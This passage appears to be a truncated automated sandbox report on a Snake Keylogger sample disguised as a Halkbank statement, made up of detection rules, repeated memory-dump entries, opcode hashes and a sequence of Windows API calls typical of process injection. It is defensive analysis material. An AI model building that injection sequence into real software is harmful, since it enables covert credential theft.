                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                              Execution Graph

                                                              Execution Coverage:9.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:204
                                                              Total number of Limit Nodes:15
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0255D4E6
                                                              • GetCurrentThread.KERNEL32 ref: 0255D523
                                                              • GetCurrentProcess.KERNEL32 ref: 0255D560
                                                              • GetCurrentThreadId.KERNEL32 ref: 0255D5B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0255D4E6
                                                              • GetCurrentThread.KERNEL32 ref: 0255D523
                                                              • GetCurrentProcess.KERNEL32 ref: 0255D560
                                                              • GetCurrentThreadId.KERNEL32 ref: 0255D5B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02700FC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02700FC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0255B01E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 025559C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 025559C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02700B98
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02700B98
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 027009EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02700C78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02700C78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 027009EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0255D737
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0255D737
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02700AB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0255B099,00000800,00000000,00000000), ref: 0255B2AA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0255B099,00000800,00000000,00000000), ref: 0255B2AA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02700AB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 027051D0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 2591292051-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0270345D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 027051D0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 2591292051-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0270345D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0255B01E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76454e75f86efc3460d2611655f9173f4531c249dbdf81ce77c69e868ce452db
                                                              • Instruction ID: 96dddd126d6d84a89cbef59be89c5a0d824440fad7adf80d5033cd457c865fc5
                                                              • Opcode Fuzzy Hash: 76454e75f86efc3460d2611655f9173f4531c249dbdf81ce77c69e868ce452db
                                                              • Instruction Fuzzy Hash: 4B21D0B5D043499FDB50DFAAD884ADEBBF4FB48320F10842AE919A7310C375A954CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1978915049.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_acd000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                              • Instruction ID: 456336bc2bb819161cec2ec989a87338ff104a75f095270fc692582a46ce6bab
                                                              • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                              • Instruction Fuzzy Hash: B211D376504284CFCB16CF14D9C4B16BF71FB94314F24C6ADD8490B656C336D85ACBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1978959016.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_add000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                              • Instruction ID: 777b5d88bfedfe8c03339cc32d0e08a21f427551b8ea96247c645c9c97a60aec
                                                              • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                              • Instruction Fuzzy Hash: 3C11BB75904280DFCB02CF10D5C4B55BBB1FB84314F24C6AAD84A4B796C33AD80ACB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 53d66598ef5f69da87046c295484ecd20f26949010c7a846838401676e664a89
                                                              • Instruction ID: 97526cef6e25aedddab0b3b021e2b30fbf819ad5d2d33b8db59f6e9fd6352407
                                                              • Opcode Fuzzy Hash: 53d66598ef5f69da87046c295484ecd20f26949010c7a846838401676e664a89
                                                              • Instruction Fuzzy Hash: 7B11C3B8E00508DFC740DFA9E188A9DBBF1FB88310F5281D5D984AB355C770EAA0CB45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: edb67cb10f1a445e03bb33b81dc378ffba59ff69cd2bb2e219b19d113742d4ce
                                                              • Instruction ID: 5ad7f68a71fe978b4fa43129f362db3fb1fc5221b05de7e358bc660d7efaa2a3
                                                              • Opcode Fuzzy Hash: edb67cb10f1a445e03bb33b81dc378ffba59ff69cd2bb2e219b19d113742d4ce
                                                              • Instruction Fuzzy Hash: 8BE012F1805148DFCB91FFB5D50469E7BF9EB0B305F0045A6960A97111EBB28E04DB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d485ad042fb6e7464376a75aa04954a973fd212363c1c08ec55970ad1633f6c0
                                                              • Instruction ID: 44fe974a642c5e388ca4fd9bf11cf31a16313508da432368e09adee74abb4399
                                                              • Opcode Fuzzy Hash: d485ad042fb6e7464376a75aa04954a973fd212363c1c08ec55970ad1633f6c0
                                                              • Instruction Fuzzy Hash: DAE0C274908108DBCB04EFA4E5405BCBBB9EB85300F1081ADC80827350CBB1AE02DB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8dc3c503f62e3138968043e5ce080ac34c5ed61ff5fadee0a71a463a5ffbe5d8
                                                              • Instruction ID: 1101996346da2f49c9be1bb7bf6429edb2171682602ca4f3e9f9c89431dfb551
                                                              • Opcode Fuzzy Hash: 8dc3c503f62e3138968043e5ce080ac34c5ed61ff5fadee0a71a463a5ffbe5d8
                                                              • Instruction Fuzzy Hash: 9CE017B0E41208EFCB80EFB8D54969CBBF5AB04205F1041AAD908E3340EB705E44CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16fb3d336e528a00c84137de7ae7426abb11ec86f7b5146924b049b00e55e97e
                                                              • Instruction ID: 96a1a3ce2c27ddac0742defa6b08a17409c610e6e86d78bcf48ae57cb1fcc0ea
                                                              • Opcode Fuzzy Hash: 16fb3d336e528a00c84137de7ae7426abb11ec86f7b5146924b049b00e55e97e
                                                              • Instruction Fuzzy Hash: 73C08C700422048BC3143BAAA60C3247BBE6B00206F006065F308464608AB05408CB66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq$Te]q$paq$xb`q
                                                              • API String ID: 0-4160082283
                                                              • Opcode ID: d5448bd739e9923d03b0e2b7657698b53649b7b66161128a2b15dbb94ab1b657
                                                              • Instruction ID: 04699710642ac8b26a1b6667a21d1b8a8e408cc5909be17569ce1ebd9b28feff
                                                              • Opcode Fuzzy Hash: d5448bd739e9923d03b0e2b7657698b53649b7b66161128a2b15dbb94ab1b657
                                                              • Instruction Fuzzy Hash: DCB2B075E00628CFDB64DF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8707a18f76d36caee7ac112e3c6b5a2afedd830c38fb7713bc6465eb51c7909
                                                              • Instruction ID: 13b78c6dd67249216ad8d80cd9247bfab1ad4c79e889091634b46bb689ba6dd1
                                                              • Opcode Fuzzy Hash: a8707a18f76d36caee7ac112e3c6b5a2afedd830c38fb7713bc6465eb51c7909
                                                              • Instruction Fuzzy Hash: 20E1F774E00259CFCB14DFA8C580AAEFBF2BF89314F248569E415AB396D730A945CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: da03209da8d729e513fd5e1c850a2b4f2fb66850005d1f9543d83724e5b7ec28
                                                              • Instruction ID: ae23cc7df74a8d16639d4d0237050dae2e3b337efa62706fa866363ad6f72b73
                                                              • Opcode Fuzzy Hash: da03209da8d729e513fd5e1c850a2b4f2fb66850005d1f9543d83724e5b7ec28
                                                              • Instruction Fuzzy Hash: 2CD1F871D20B5A8ACB11EB74D990A9DB3B1FF95300F21C79AE10A7B214EB706AC5CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7829f9fb79b0b612854f941acaa5b90ad2100ace1208c6bf4e48b0cc9c8f7bc1
                                                              • Instruction ID: 3228c175d190fef7a0795d0f4cfddc03214ed58a4d368fc51dc7de1fcf3c57b6
                                                              • Opcode Fuzzy Hash: 7829f9fb79b0b612854f941acaa5b90ad2100ace1208c6bf4e48b0cc9c8f7bc1
                                                              • Instruction Fuzzy Hash: 80A17E36E002198FCF05DFB4C5505AEBBB2FF86304B15856AED06AB261DB31E916CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc15b00d606d757f262baaef0ab1192f5d90564ba01586f16b4c3f57360aa8b1
                                                              • Instruction ID: c29c6e71c3ae96bdf27abcc747075eead8f256d89673510efc08457578f0e828
